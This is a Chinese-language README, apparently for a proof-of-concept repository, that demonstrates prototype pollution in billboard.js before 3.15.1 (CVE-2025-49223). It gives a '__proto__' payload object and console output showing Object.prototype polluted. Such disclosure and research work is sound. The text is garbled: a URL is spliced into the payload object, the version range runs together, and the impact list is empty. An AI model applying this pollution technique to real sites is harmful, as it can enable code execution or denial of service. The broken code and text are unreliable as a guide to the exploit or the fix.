已发现 billboard.js 3.15.1 之前的版本通过
generate函数包含原型污染,这可能允许攻击者通过注入任意属性来执行任意代码或导致拒绝服务(DoS)。
本仓库演示了在 billboard.js 3.15.1 之前版本中发现的原型污染漏洞,该漏洞已披露为 CVE-2025-49223。
<= 3.14.0>= 3.15.1在浏览器中打开 index.html 并查看控制台日志中的原型污染尝试。
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>
{
["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/main/%7B
polluted: "polluted_via_string_key"
}
}
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
这证实了攻击者可以污染 Object.prototype,从而影响页面上随后创建的任何对象。
成功利用可能导致:
billboard.js 版本 3.15.1 或更高版本⚠️ 免责声明: 此 PoC 仅用于教育和研究目的。请负责任地使用。